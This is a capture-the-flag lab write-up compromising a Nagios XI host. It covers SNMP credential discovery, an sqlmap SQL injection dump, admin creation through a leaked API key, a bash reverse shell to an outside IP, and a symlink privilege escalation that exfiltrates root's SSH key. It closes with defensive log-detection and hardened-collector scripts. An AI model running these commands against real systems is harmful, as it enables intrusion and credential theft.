# Lessons Learned

- **Symlink an inaccessible file (e.g., `/root/.ssh/id_rsa`) or dir (e.g., `c:\xampp\htdocs\` or `/var/www/html/`) to a writable one**
- If we spot lots of directories from a `ffuf` directory fuzz, turn to `feroxbuster` to drill down into the associated dirs
- Review documentation for API endpoints and look to gather authentication tokens and API keys to further access/enum
- There is a `seclists` wordlist for API objects: `/usr/share/seclists/Discovery/Web-Content/api/objects.txt`
- Manipulate the light `nmap` scan output to produce a comma-separated port list

```bash
# keep only the "port/proto" lines (drops the "Not shown: ... (reset)" summary), take the port number, join with commas
cat nmap/light | grep -v "(" | grep / | cut -d'/' -f 1 | sed -z 's/\n/,/g; s/,$/\n/'
```

---

# After-Action Attack Sequence

- We have access to a Nagios login portal
- Default creds don't work; SQLi doesn't work; we cannot enumerate the version
- Directory fuzzing reveals multiple dirs, including Shell In A Box at `/terminal`
- SNMP enum reveals creds for `svc`
- These don't work for Nagios or Shell In A Box
- Return to Nagios enum
- Some Googling reveals that Nagios has three API sections, `objects`, `system`, and `config`, nested under `domain.tld/nagiosxi/api/v1/`
- A forum post notes that we can grab an authentication token with the following command: `curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=USERNAME&password=YOURPASS&valid_min=5'`
- Insert the creds for `svc` above
- Now use the auth token with the `?token` GET parameter directed at the root dir
- This provides access to the Nagios dashboard
- Nagios access as `svc`
- From here we see Nagios XI version 5.11.0
- A Google search reveals that this version of Nagios has an SQLi vuln that can be used to dump the `xi_users` table
- After running an `sqlmap` command to dump `xi_users`, we have API keys and uncrackable password hashes for `Nagios Administrator` and `svc`
- Using the admin's API key, we can create an admin-level user `jacob`
- Admin Nagios access as `jacob`
- From here we can add a revshell to the `Commands` tab of the `Core Config Manager` and run it using the `Monitoring-Hosts` tab of the `Core Config Manager`
- Revshell as `nagios`
- After enumerating with `sudo -l`, this user can run many services and scripts as root
- Review `getprofile.sh`: this script retrieves the last 1000 lines of several logs from `/usr/local/nagiosxi/var/` and `/var/log`, archives them and dumps the ZIP in `/usr/local/nagiosxi/var/components/`
- Of note, `/usr/local/nagiosxi/tmp/phpmailer.log` is writable by `nagios`
- We can abuse this writable `phpmailer.log` file by creating a symlink to `/root/.ssh/id_rsa`
- Run `getprofile.sh` after creating the above symlink
- Unzip the file in `/usr/local/nagiosxi/var/components/` and grab `id_rsa`
- SSH connect as `root` with `id_rsa`

---

# Discover Ports & Services

- `ping` test
  ![[images/Pasted image 20260330200654.png]]
- `nmap` scan - light
  ![[images/Pasted image 20260330201312.png]]
- `nmap` scan - detailed
  ![[images/Pasted image 20260330201708.png]]
- Note: port 80 redirects to port 443, associated with `nagios.monitored.htb`
- Note: odd to have LDAP open on a Linux host
- Note: port 5667 is a curiosity
  - This is a Nagios-specific port
- No exploits for Apache 2.4.56
- `nmap` scan - UDP
  ![[images/Pasted image 20260330210403.png]]
- Not surprising that SNMP is open for a network monitoring tool, but it deserves further inspection

---

# Service Enum

## Port 443 (https): Apache 2.4.56

- Visit page
  ![[images/Pasted image 20260330202315.png]]
- Request:Response in Burp
  ![[images/Pasted image 20260330202423.png]]
- Try `robots.txt` and `sitemap.xml` > standard 404
- Try random page > standard 404
- Try `index.php` > returns above page
- Click on `Access Nagios XI` to bring up
  ![[images/Pasted image 20260330202633.png]]
- Request:Response in Burp
  ![[images/Pasted image 20260330202803.png]]
- Try default creds `nagiosadmin:admin` > not working
- Google how to enumerate the `Nagios XI` version
- Search for msf module
  ![[images/Pasted image 20260330203839.png]]
- Set options
  ![[images/Pasted image 20260330204015.png]]
- Web fuzzing
  - directory: raft-large
    ![[images/Pasted image 20260330204932.png]]
  - vhost: subdomain-top1million-20000
    ![[images/Pasted image 20260330205254.png]]
- Visit `nagios.monitored.htb/nagiosxi/terminal` > Shell In A Box?
  ![[images/Pasted image 20260330204757.png]]
- Run `whatweb`
  ![[images/Pasted image 20260330205437.png]]
- Test for SQLi > first create `req.txt` with the POST request

```bash
sqlmap -r req.txt --batch
sqlmap -r req.txt --batch --risk=3 --level=5
```

## Port 161 (snmp)

- Port-specific scan
  ![[images/Pasted image 20260330211059.png]]
  ![[images/Pasted image 20260330211118.png]]
- Further SNMP-specific enum is required

```bash
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.129.230.96
snmpwalk -v2c -c public 10.129.230.96 | grep -i string > snmpwalk.txt
```

![[images/Pasted image 20260331193451.png]]
![[images/Pasted image 20260331195747.png]]

- Above we see creds for `svc` used to run `/opt/scripts/check_host.sh`
- Unable to SSH or access Shell In A Box with these creds
- Also cannot get into Nagios with these creds
  ![[images/Pasted image 20260331194244.png]]

## Port 443 (https): API enum

- After doing some Googling, we see that there are three API sections: `objects`, `system`, and `config`
- These are nested under `domain.tld/nagiosxi/api/v1/`, or for our example `nagios.monitored.htb/nagiosxi/api/v1/`
- We need to determine how to return an authentication token
- This post, [Help with insecure login / backend ticket authentication. - Nagios Support Forum](https://support.nagios.com/forum/viewtopic.php?p=310411#p310411), indicates that we execute a `curl` command as below to grab an authentication token

```bash
curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=YOURPASS&valid_min=5'
```

![[images/Pasted image 20260331203354.png]]

---

# Foothold as `svc`

## Use Authentication Token to Access Nagios Dashboard as `svc`

- We know from the above post that we use the auth token with this GET param: `?token=ac15e2370b4df7b74e7a3970e6c38512360293cc` > try to use it on the main login page
  ![[images/Pasted image 20260331204121.png]]
- That gets us into the dashboard as `svc`
  ![[images/Pasted image 20260331204144.png]]
- We are on version 5.11.0

## Grab API Key for `admin`

- Enumerate vulns for this version
- Nothing for this version in `searchsploit`
  ![[images/Pasted image 20260331204348.png]]
- Check Google
  ![[images/Pasted image 20260331204534.png]]
- SQLi and authenticated RCE
- This [post](https://medium.com/@n1ghtcr4wl3r/nagios-xi-vulnerability-cve-2023-40931-sql-injection-in-banner-ace8258c5567) provides an `sqlmap` command using the cookie of an authenticated user

```bash
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=mvtt1u5d54171n7uupops4gorh" --batch --threads 10 -D nagiosxi -T xi_users --dump
```

- The `xi_users` table provides API keys and uncrackable passwords
  ![[images/Pasted image 20260331205457.png]]

## Create admin-level user `jacob` with admin's API key

- Create an admin-level user with the API key for `[email protected]`

```bash
curl -d "username=jacob&password=password123@&name=jacobo&[email protected]&auth_level=admin&force_pw_change=0" -k 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL'
```

![[images/Pasted image 20260331205838.png]]

## Access Nagios Dashboard as admin-level user `jacob`

- Now try to log in with the new user > we are in as an admin
  ![[images/Pasted image 20260331205938.png]]

## Add a revshell to `Commands` tab and run with `Hosts`

- With admin access we have access to the `Commands` tab of the `Core Config Manager`
  ![[images/Pasted image 20260331210049.png]]
- Let's add a simple revshell
  ![[images/Pasted image 20260331211157.png]]

```bash
bash -c 'bash -i >& /dev/tcp/10.10.14.197/443 0>&1'
```

- Now go to `Hosts` under the `Monitoring` tab and select `revshell`, then select `Run Check Command`
  ![[images/Pasted image 20260331211005.png]]

---

# Shell as `nagios`

- We have a shell as `nagios`
  ![[images/Pasted image 20260331211209.png]]
- Upgrade shell

```bash
script /dev/null -c bash
# Ctrl-Z to background the shell
^z
stty raw -echo; fg
# answer the "Terminal type?" prompt from reset with: screen
reset
screen
```

## Privesc

- Based on the above `sudo -l` output there is a lot we have access to > let's focus on scripts we can run with `sudo`
- According to `getprofile.sh`, log files from `/var/log` are dumped into `/usr/local/nagiosxi/var/components`
- Of note, `/usr/local/nagiosxi/tmp/phpmailer.log` is owned by `nagios`
  ![[images/Pasted image 20260331213346.png]]
- Let's overwrite it with a symlink to `/root/.ssh/id_rsa` and confirm

```bash
ln -sf /root/.ssh/id_rsa /usr/local/nagiosxi/tmp/phpmailer.log
ls -l /usr/local/nagiosxi/tmp/phpmailer.log
```

![[images/Pasted image 20260331213452.png]]

- Now let's run `getprofile.sh` with `sudo`
  ![[images/Pasted image 20260331212025.png]]
- According to the script, the `.zip` file is saved in `/usr/local/nagiosxi/var/components`

```bash
unzip -l profile.zip
```

![[images/Pasted image 20260331213732.png]]

- Review `phpmailer.log` > reveals an SSH private key

```bash
unzip -p profile.zip profile-1775007338/phpmailer.log
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAnZYnlG22OdnxaaK98DJMc9isuSgg9wtjC0r1iTzlSRVhNALtSd2C
FSINj1byqeOkrieC8Ftrte+9eTrvfk7Kpa8WH0S0LsotASTXjj4QCuOcmgq9Im5SDhVG7/
...[snip]...
CNvArnlhyB8ZevAAAADnJvb3RAbW9uaXRvcmVkAQIDBA==
-----END OPENSSH PRIVATE KEY-----
```

---

# Shell as `root`

- Connect via `ssh` with `id_rsa` for `[email protected]`

```bash
sudo chmod 600 id_rsa
sudo ssh -i id_rsa [email protected]
```

![[images/Pasted image 20260331214049.png]]
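Seen from the Nagios host's side, the whole sequence above (token auth, SQLi against the banner helper, user creation with an API key in the URL) leaves a distinctive trail in the Apache access log. The following is an added example of mine, not the writeup's or Nagios XI's code: a detection pass over constructed combined-format log lines that flags API keys or backend-ticket tokens carried in the query string, REST-API user creation, and a burst of hits on the banner helper. The function name, the IPs, the `KEY` and `TOKEN` placeholders and the 20-request threshold are assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup or Nagios XI): a defender-side pass over Apache
# combined-format access logs that flags the footprint of the sequence above. Reads
# log lines on stdin and prints one finding per line. The threshold is arbitrary.
flag_nagios_api_abuse() {
    awk '
    {
        ip = $1; method = $6; path = $7
        gsub(/"/, "", method)
        # 1. Credentials in the query string: an API key or backend-ticket token in the
        #    URL is written to this log in clear text, so anyone who reads the log holds it.
        if (path ~ /[?&]apikey=/) print "apikey-in-url " ip " " method " " path
        if (path ~ /[?&]token=/)  print "token-in-url " ip " " path
        # 2. Account creation through the REST API (how the admin-level user was added above).
        if (method == "POST" && path ~ /\/nagiosxi\/api\/v1\/system\/user/) print "api-user-create " ip
        # 3. Many hits on the banner helper from one source: the SQLi path used to dump xi_users.
        if (path ~ /banner_message-ajaxhelper\.php/) banner[ip]++
    }
    END {
        for (ip in banner) if (banner[ip] >= 20) print "banner-burst " ip " " banner[ip]
    }'
}

# Constructed sample log: 192.0.2.10 plays the attacker, 192.0.2.20 a normal user.
# KEY and TOKEN are placeholders, not values from any host.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [31/Mar/2026:20:33:54 +0000] "POST /nagiosxi/api/v1/authenticate?pretty=1 HTTP/1.1" 200 143 "-" "curl/8.5.0"
192.0.2.10 - - [31/Mar/2026:20:41:21 +0000] "GET /nagiosxi/?token=TOKEN HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.20 - - [31/Mar/2026:20:45:02 +0000] "POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1" 200 52 "https://nagios.monitored.htb/nagiosxi/" "Mozilla/5.0"
192.0.2.10 - - [31/Mar/2026:20:58:38 +0000] "POST /nagiosxi/api/v1/system/user?apikey=KEY HTTP/1.1" 200 88 "-" "curl/8.5.0"
192.0.2.20 - - [31/Mar/2026:21:00:01 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
EOF
    # 25 automated requests against the same helper from the attacker address.
    i=0
    while [ "$i" -lt 25 ]; do
        echo '192.0.2.10 - - [31/Mar/2026:20:55:10 +0000] "POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"'
        i=$((i + 1))
    done
}

sample_log | flag_nagios_api_abuse
```

The single legitimate acknowledgement from 192.0.2.20 stays under the threshold, so only the four attacker findings are printed.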
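The root cause on the privesc side is a root-run collector that tails whatever `/usr/local/nagiosxi/tmp/phpmailer.log` currently names, without checking that the name still refers to a log. The `collect_log` function below is an added example of the check such a script should make (hypothetical, my code rather than `getprofile.sh`): refuse symlinks and multiply-linked files before reading anything, then take the last 1000 lines. The files and paths in the demonstration are constructed.

```shell
#!/bin/sh
# Hypothetical hardened counterpart to a root-run log collector (an added example,
# not Nagios XI's getprofile.sh). collect_log SRC DST copies the last 1000 lines
# of SRC to DST and returns 0, or returns 1 without reading anything when SRC is
# not a plain, single-link regular file that a lower-privileged writer could alias.
collect_log() {
    src="$1"
    dst="$2"
    # Check for a symlink first, before any test or command that follows links:
    # whoever can replace the log name can point it at /root/.ssh/id_rsa.
    if [ -L "$src" ]; then
        echo "refused: $src is a symlink" >&2
        return 1
    fi
    # Regular files only: no directories, devices or FIFOs.
    if [ ! -f "$src" ]; then
        echo "refused: $src is not a regular file" >&2
        return 1
    fi
    # A hard link aliases the inode rather than the name; find -links 1 (POSIX)
    # prints the path only when it is the sole link to the file.
    if [ -z "$(find "$src" -links 1)" ]; then
        echo "refused: $src has more than one hard link" >&2
        return 1
    fi
    tail -n 1000 "$src" > "$dst"
}

# Constructed demonstration: one genuine log beside a log name that has been
# replaced by a symlink to a file the collector must not copy into its archive.
demo_dir=$(mktemp -d)
printf 'constructed private key stand-in\n' > "$demo_dir/id_rsa"
printf 'mail sent ok\n' > "$demo_dir/real.log"
ln -s "$demo_dir/id_rsa" "$demo_dir/phpmailer.log"
collect_log "$demo_dir/real.log" "$demo_dir/real.out" && echo "collected real.log"
collect_log "$demo_dir/phpmailer.log" "$demo_dir/mailer.out" || echo "skipped phpmailer.log"
rm -rf "$demo_dir"
```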